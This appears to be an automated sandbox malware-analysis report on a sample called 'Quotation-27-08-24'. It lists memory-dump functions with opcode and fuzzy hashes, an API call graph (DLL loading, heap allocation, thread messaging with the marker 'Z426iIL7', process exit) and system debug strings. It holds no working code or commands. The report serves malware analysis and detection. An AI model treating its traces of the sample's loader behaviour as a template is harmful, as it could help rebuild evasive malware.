                                          Function 05381808 Relevance: .2, Instructions: 223COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130747844.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5380000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 579c0e64fd3c30400a11c53f8934ef0f6c20d7f3f4e2ecc6af449b699942607b
                                          • Instruction ID: 79456c43c533dd5825c05555179ae8bc7b6ced0d85175e575b98b9e810c76208
                                          • Opcode Fuzzy Hash: 579c0e64fd3c30400a11c53f8934ef0f6c20d7f3f4e2ecc6af449b699942607b
                                          • Instruction Fuzzy Hash: 28C1C3B18217458AE730CF66E8481D97BB1BB85324F918709D2616F2F9EBB415CBCF44
                                          Function 053BFDC3 Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef8b400122d229f96181f2fcebe51680b343640e339b64032c88754d99392b03
                                          • Instruction ID: 99a4fc851a9cbc56eb659e5d91edc92b16ae68dbf0f32c46c582320ec0d5f8b5
                                          • Opcode Fuzzy Hash: ef8b400122d229f96181f2fcebe51680b343640e339b64032c88754d99392b03
                                          • Instruction Fuzzy Hash: FB41E531A042558FCB05CB78DC404FEBFBBEF89210B14606BD601E7A62D6728D05C791
                                          Function 073F9553 Relevance: .1, Instructions: 130COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b23050ff8ff1e65bb856c35ead67b2c4bdf8801f1595c28be6800a5c80fa0586
                                          • Instruction ID: da2884ede46040e9603a91e7b26828c0ffc469a20217f58343ee3dae4ca9acc9
                                          • Opcode Fuzzy Hash: b23050ff8ff1e65bb856c35ead67b2c4bdf8801f1595c28be6800a5c80fa0586
                                          • Instruction Fuzzy Hash: B2513DB4E002598FDB14DFA9C5806AEFBF2FF89304F248269D508A7315D731A942CFA1
                                          Function 073F6C8B Relevance: .1, Instructions: 129COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131595219.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_73f0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e59d765c4e8a10ecf75d5d1159b78cd201ac5ffe05f73f0b698b58e7d8972a8f
                                          • Instruction ID: 4a04d4400da716992112fe6cc7b1260aa97dc8de5ea466528d86aa540b8d1fd7
                                          • Opcode Fuzzy Hash: e59d765c4e8a10ecf75d5d1159b78cd201ac5ffe05f73f0b698b58e7d8972a8f
                                          • Instruction Fuzzy Hash: 2B514DB5E002598FDB14CFA9C5815AEFBF2FF89304F248269D418A7315D7319942CF60
                                          Function 053BFDE0 Relevance: .1, Instructions: 112COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2130809355.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_53b0000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2624d1252c7a044b0b4d88e41c4aa6df0fe371969d4216c3deb4c47def48972e
                                          • Instruction ID: 0b1edd38da81595187344b903ee52e7cac68ebc42521c3329e3da1ae68fbc6a4
                                          • Opcode Fuzzy Hash: 2624d1252c7a044b0b4d88e41c4aa6df0fe371969d4216c3deb4c47def48972e
                                          • Instruction Fuzzy Hash: 2541B431F14119DBDB18CEA9D9814FEBBFBEF88310B10652AD605EBA51D672CD01C791

                                          Execution Graph

                                          Execution Coverage:1.2%
                                          Dynamic/Decrypted Code Coverage:5.2%
                                          Signature Coverage:8.1%
                                          Total number of Nodes:135
                                          Total number of Limit Nodes:10
                                          execution_graph 91417 4247e3 91418 4247ff 91417->91418 91419 424827 91418->91419 91420 42483b 91418->91420 91422 42c443 NtClose 91419->91422 91427 42c443 91420->91427 91424 424830 91422->91424 91423 424844 91430 42e633 RtlAllocateHeap 91423->91430 91426 42484f 91428 42c45d 91427->91428 91429 42c46e NtClose 91428->91429 91429->91423 91430->91426 91568 424b73 91573 424b8c 91568->91573 91569 424c1f 91570 424bd7 91571 42e513 RtlFreeHeap 91570->91571 91572 424be7 91571->91572 91573->91569 91573->91570 91574 424c1a 91573->91574 91575 42e513 RtlFreeHeap 91574->91575 91575->91569 91576 42ba33 91577 42ba50 91576->91577 91580 fa2df0 LdrInitializeThunk 91577->91580 91578 42ba78 91580->91578 91581 42f6d3 91582 42f6e3 91581->91582 91583 42f6e9 91581->91583 91584 42e5f3 RtlAllocateHeap 91583->91584 91585 42f70f 91584->91585 91431 413843 91434 42c6d3 91431->91434 91435 42c6f0 91434->91435 91438 fa2c70 LdrInitializeThunk 91435->91438 91436 413865 91438->91436 91439 413dc3 91440 413ddd 91439->91440 91445 417583 91440->91445 91442 413dfb 91443 413e40 91442->91443 91444 413e2f PostThreadMessageW 91442->91444 91444->91443 91446 4175a7 91445->91446 91447 4175ae 91446->91447 91448 4175e3 LdrLoadDll 91446->91448 91447->91442 91448->91447 91449 401bc2 91450 401b6e 91449->91450 91451 401bca 91449->91451 91454 42fba3 91450->91454 91457 42e0c3 91454->91457 91458 42e0e9 91457->91458 91469 407843 91458->91469 91460 42e0ff 91461 401bb8 91460->91461 91472 41aef3 91460->91472 91463 42e11e 91464 42e133 91463->91464 91487 42c803 91463->91487 91483 428103 91464->91483 91467 42e14d 91468 42c803 ExitProcess 91467->91468 91468->91461 91490 416243 91469->91490 91471 407850 91471->91460 91473 41af1f 91472->91473 91514 41ade3 91473->91514 91476 41af64 91478 41af80 91476->91478 91481 42c443 NtClose 91476->91481 91477 41af4c 91479 41af57 91477->91479 91480 42c443 NtClose 91477->91480 91478->91463 91479->91463 91480->91479 91482 41af76 91481->91482 91482->91463 91484 428164 91483->91484 91486 428171 91484->91486 91525 4183f3 91484->91525 91486->91467 91488 42c820 91487->91488 91489 42c831 ExitProcess 91488->91489 91489->91464 91491 416260 91490->91491 91493 416279 91491->91493 91494 42ce93 91491->91494 91493->91471 91495 42cead 91494->91495 91496 42cedc 91495->91496 91501 42ba83 91495->91501 91496->91493 91502 42ba9d 91501->91502 91508 fa2c0a 91502->91508 91503 42bac9 91505 42e513 91503->91505 91511 42c7b3 91505->91511 91507 42cf55 91507->91493 91509 fa2c1f LdrInitializeThunk 91508->91509 91510 fa2c11 91508->91510 91509->91503 91510->91503 91512 42c7d0 91511->91512 91513 42c7e1 RtlFreeHeap 91512->91513 91513->91507 91515 41adfd 91514->91515 91519 41aed9 91514->91519 91520 42bb23 91515->91520 91518 42c443 NtClose 91518->91519 91519->91476 91519->91477 91521 42bb3d 91520->91521 91524 fa35c0 LdrInitializeThunk 91521->91524 91522 41aecd 91522->91518 91524->91522 91526 41841d 91525->91526 91532 41892b 91526->91532 91533 413a23 91526->91533 91528 41854a 91529 42e513 RtlFreeHeap 91528->91529 91528->91532 91530 418562 91529->91530 91531 42c803 ExitProcess 91530->91531 91530->91532 91531->91532 91532->91486 91537 413a43 91533->91537 91535 413aac 91535->91528 91536 413aa2 91536->91528 91537->91535 91538 41b203 RtlFreeHeap LdrInitializeThunk 91537->91538 91538->91536 91539 41b0e3 91540 41b127 91539->91540 91541 42c443 NtClose 91540->91541 91542 41b148 91540->91542 91541->91542 91543 41a383 91544 41a39b 91543->91544 91546 41a3f5 91543->91546 91544->91546 91547 41e2d3 91544->91547 91548 41e2f9 91547->91548 91552 41e3ed 91548->91552 91553 42f803 91548->91553 91550 41e38b 91551 42ba83 LdrInitializeThunk 91550->91551 91550->91552 91551->91552 91552->91546 91554 42f773 91553->91554 91555 42f7d0 91554->91555 91559 42e5f3 91554->91559 91555->91550 91557 42f7ad 91558 42e513 RtlFreeHeap 91557->91558 91558->91555 91562 42c763 91559->91562 91561 42e60e 91561->91557 91563 42c77d 91562->91563 91564 42c78e RtlAllocateHeap 91563->91564 91564->91561 91565 418b48 91566 42c443 NtClose 91565->91566 91567 418b52 91566->91567 91586 fa2b60 LdrInitializeThunk

                                          Executed Functions

                                          Function 00417583 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 178 417583-41759f 179 4175a7-4175ac 178->179 180 4175a2 call 42f213 178->180 181 4175b2-4175c0 call 42f813 179->181 182 4175ae-4175b1 179->182 180->179 185 4175d0-4175e1 call 42db93 181->185 186 4175c2-4175cd call 42fab3 181->186 191 4175e3-4175f7 LdrLoadDll 185->191 192 4175fa-4175fd 185->192 186->185 191->192
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175F5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 0d697ff97b7bf7ef080c10395bac8f7f97858c555f2fc09287bfaac7e5fb147e
                                          • Instruction ID: b50bd6731deed96e950b08a0aa8feab8488cbe6f506688fedb54eada03f9b3f3
                                          • Opcode Fuzzy Hash: 0d697ff97b7bf7ef080c10395bac8f7f97858c555f2fc09287bfaac7e5fb147e
                                          • Instruction Fuzzy Hash: F60171B5E0020DBBDF10DBE5DD42FDEB7789B14308F4081AAE90897241F635EB488BA5
                                          Function 0042C443 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 203 42c443-42c47c call 404ad3 call 42d683 NtClose
                                          APIs
                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C477
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 087d854117f242ca877c517a827cee7a74cf93268eeac0a7a33afdcf45fba969
                                          • Instruction ID: 51114d8caf44d8c8ec11044850fe6d8fdd2803b96a5a8929edc6ca14ef13830b
                                          • Opcode Fuzzy Hash: 087d854117f242ca877c517a827cee7a74cf93268eeac0a7a33afdcf45fba969
                                          • Instruction Fuzzy Hash: D1E086756002147BC610EB5ADC01FD7B79DDFC5754F00841AFA08A7141CA70791087F4
                                          Function 00FA2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 217 fa2b60-fa2b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: da4f0c0c48aaf92bd89fb117e7b18152bd100f391a33d8b7fac8db75b6099644
                                          • Instruction ID: 778b7ceb9fd645a1aa591e683abfe89eff6a0bbfc408362a0183e6bc92bd035e
                                          • Opcode Fuzzy Hash: da4f0c0c48aaf92bd89fb117e7b18152bd100f391a33d8b7fac8db75b6099644
                                          • Instruction Fuzzy Hash: C590026120240013420571598814656400E87E0341B55C032E10155D0EC9298992B925
                                          Function 00FA2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 218 fa2c70-fa2c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0bda2e9ddc2be9dbd378e8f14e1dd7c1bb03bd83e87eae9762e1df4c6395dc88
                                          • Instruction ID: 8af42a157bced598b53946c69341dcbfe877e9aaa065210cc6926d1ba234737a
                                          • Opcode Fuzzy Hash: 0bda2e9ddc2be9dbd378e8f14e1dd7c1bb03bd83e87eae9762e1df4c6395dc88
                                          • Instruction Fuzzy Hash: 1A90023120148812D2107159C80478A000D87D0341F59C422A4425698E8A998992B921
                                          Function 00FA2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 219 fa2df0-fa2dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7cd76b7972a0dcaf54c09d97b7a1a5ca2bc2ebcc9f12bea7c2f2a9bec237c493
                                          • Instruction ID: 9517d00eab424d98d8442838862014c51fc2a734ac2b24bdb3d10d9f15128336
                                          • Opcode Fuzzy Hash: 7cd76b7972a0dcaf54c09d97b7a1a5ca2bc2ebcc9f12bea7c2f2a9bec237c493
                                          • Instruction Fuzzy Hash: 7290023120140423D21171598904747000D87D0381F95C423A0425598E9A5A8A53F921
                                          Function 00FA35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 220 fa35c0-fa35cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7452d8bc660806c42174e3745beb7fd4d8fd05f950eb90e498531353c9e28b6d
                                          • Instruction ID: 68e663891a30bffe9fd1c570e1488b62b4574376199ce01a593b97010f99aa48
                                          • Opcode Fuzzy Hash: 7452d8bc660806c42174e3745beb7fd4d8fd05f950eb90e498531353c9e28b6d
                                          • Instruction Fuzzy Hash: FF90023160550412D20071598914746100D87D0341F65C422A04255A8E8B998A52BDA2
                                          Function 00413DB5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(Z426iIL7,00000111,00000000,00000000), ref: 00413E3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: Z426iIL7$Z426iIL7
                                          • API String ID: 1836367815-738817621
                                          • Opcode ID: 30b693517c8c9454ad460155bc8a2683d0b8e65c534fb3cab12401e0dbaecb32
                                          • Instruction ID: e26a7590a9c3392bd6a581aed72e26fd541f9dbc59b2ba068317312168064fe5
                                          • Opcode Fuzzy Hash: 30b693517c8c9454ad460155bc8a2683d0b8e65c534fb3cab12401e0dbaecb32
                                          • Instruction Fuzzy Hash: B01106B1D00218BADB01EAD6DC81DEF7B7CEF41794F01846AFA04B7101D6395E068BA5
                                          Function 00413DC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(Z426iIL7,00000111,00000000,00000000), ref: 00413E3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: Z426iIL7$Z426iIL7
                                          • API String ID: 1836367815-738817621
                                          • Opcode ID: af9fe4e435e036b25b87145d93346286f261203749c1d65ef3814556e14f3d77
                                          • Instruction ID: d04008e4784f11087ef15b32645ef078d98fcd74c293245749b5fb37f6a58a81
                                          • Opcode Fuzzy Hash: af9fe4e435e036b25b87145d93346286f261203749c1d65ef3814556e14f3d77
                                          • Instruction Fuzzy Hash: 09010871D0021CBADB01AAE29C81DEF7B7CDF41694F018069FA04B7141D5784F0647A5
                                          Function 0042C763 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 193 42c763-42c7a4 call 404ad3 call 42d683 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,0041E38B,?,?,00000000,?,0041E38B,?,?,?), ref: 0042C79F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction ID: 94a79bd46b80dca6f3ef207c4e0b6efedf9d64307858bdde659ee4340e19f54e
                                          • Opcode Fuzzy Hash: eeb72f86ac1694eb338319ebebae05c5e7828ef32382e1dfcef9ea1218520902
                                          • Instruction Fuzzy Hash: 2CE06DB5200604BFCA10EE59DC41FDB73ADEFC9710F004019FA08A7241D670B9118BF9
                                          Function 0042C7B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 198 42c7b3-42c7f7 call 404ad3 call 42d683 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03CA3305,00000007,00000000,00000004,00000000,00416E0B,000000F4), ref: 0042C7F2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction ID: 795ca56e5001b1277c8131f72f1244a574ba4bdecb785e2ee2652dbee9fdeed6
                                          • Opcode Fuzzy Hash: 29c83403bbd505ee5ec20a26071bfde9c7c0d50249bc95c8e6454c34dea3c249
                                          • Instruction Fuzzy Hash: DEE06D72200204BBCA10EE59DC41EDB77ADEFC4710F00401AF908A7241DAB0B9108BB8
                                          Function 0042C803 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 208 42c803-42c83f call 404ad3 call 42d683 ExitProcess
                                          APIs
                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,9A5EABA1,?,?,9A5EABA1), ref: 0042C83A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_Quotation-27-08-24.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 7c2f093264db18501a861cffe165594b1c34217695bf41b587e047210b58ea4f
                                          • Instruction ID: 9e42fe514e40327288c5df8bd2f445a3cc6b8d722534ec446af54a7f9c2cf752
                                          • Opcode Fuzzy Hash: 7c2f093264db18501a861cffe165594b1c34217695bf41b587e047210b58ea4f
                                          • Instruction Fuzzy Hash: 97E046722402147BC620EB5ADC02F9BB76DDBC5718F00406AFA09A7242CBB4B91087F8
                                          Function 00FA2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 213 fa2c0a-fa2c0f 214 fa2c1f-fa2c26 LdrInitializeThunk 213->214 215 fa2c11-fa2c18 213->215
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8858fe62f8f4be6ce78cc6cdc08400da8445066f395528a0640666d87d729efe
                                          • Instruction ID: 90170a90549b85eb1ae09ca98a9ab9a5d2430bd9b7a23c6b82b662d040512e8a
                                          • Opcode Fuzzy Hash: 8858fe62f8f4be6ce78cc6cdc08400da8445066f395528a0640666d87d729efe
                                          • Instruction Fuzzy Hash: E3B09B71D015C5D5DB51E7644A0871B79046BD1761F15C072D2030681F473CC5D1F575

                                          Non-executed Functions

                                          Function 01018D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          • The instruction at %p tried to %s , xrefs: 01018F66
                                          • This failed because of error %Ix., xrefs: 01018EF6
                                          • *** enter .cxr %p for the context, xrefs: 01018FBD
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01018E3F
                                          • *** then kb to get the faulting stack, xrefs: 01018FCC
                                          • The resource is owned exclusively by thread %p, xrefs: 01018E24
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01018F3F
                                          • <unknown>, xrefs: 01018D2E, 01018D81, 01018E00, 01018E49, 01018EC7, 01018F3E
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01018FEF
                                          • read from, xrefs: 01018F5D, 01018F62
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01018E02
                                          • The instruction at %p referenced memory at %p., xrefs: 01018EE2
                                          • a NULL pointer, xrefs: 01018F90
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01018DD3
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01018E86
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01018D8C
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01018DA3
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01018E4B
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01018DB5
                                          • The resource is owned shared by %d threads, xrefs: 01018E2E
                                          • Go determine why that thread has not released the critical section., xrefs: 01018E75
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01018F26
                                          • write to, xrefs: 01018F56
                                          • *** Inpage error in %ws:%s, xrefs: 01018EC8
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01018F2D
                                          • an invalid address, %p, xrefs: 01018F7F
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01018F34
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01018DC4
                                          • The critical section is owned by thread %p., xrefs: 01018E69
                                          • *** enter .exr %p for the exception record, xrefs: 01018FA1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: efc208f555758b737bdbc4139df86d30108d2bd55b66667aa358c935daf18d02
                                          • Instruction ID: 6ecfa8817e809bc87dc25542070e172d05511d69914643b079ec0943fe5ad3f6
                                          • Opcode Fuzzy Hash: efc208f555758b737bdbc4139df86d30108d2bd55b66667aa358c935daf18d02
                                          • Instruction Fuzzy Hash: 38816935A00200BFDB169B19CC4AE6F3FB5EF86B55F004099FB046F166E379C615EA62
                                          Function 00FE2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: 84f23d41cf2f637790b24a4267bd6425707bb0a92871f18b514c3c316a17460a
                                          • Instruction ID: b95be93d025998fae8c0ad9ecf7cd0cd8fa6ca5dffedfee5c1da7641326353e9
                                          • Opcode Fuzzy Hash: 84f23d41cf2f637790b24a4267bd6425707bb0a92871f18b514c3c316a17460a
                                          • Instruction Fuzzy Hash: 5292C071A04381AFE760CF25CC85B6BB7E8BB84720F04492DFA94D7291E774E944EB52
                                          Function 00F98620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                          Download Yara Rule
                                          Strings
                                          • double initialized or corrupted critical section, xrefs: 00FD5508
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 00FD5543
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FD540A, 00FD5496, 00FD5519
                                          • corrupted critical section, xrefs: 00FD54C2
                                          • Address of the debug info found in the active list., xrefs: 00FD54AE, 00FD54FA
                                          • Thread identifier, xrefs: 00FD553A
                                          • Critical section debug info address, xrefs: 00FD541F, 00FD552E
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FD54CE
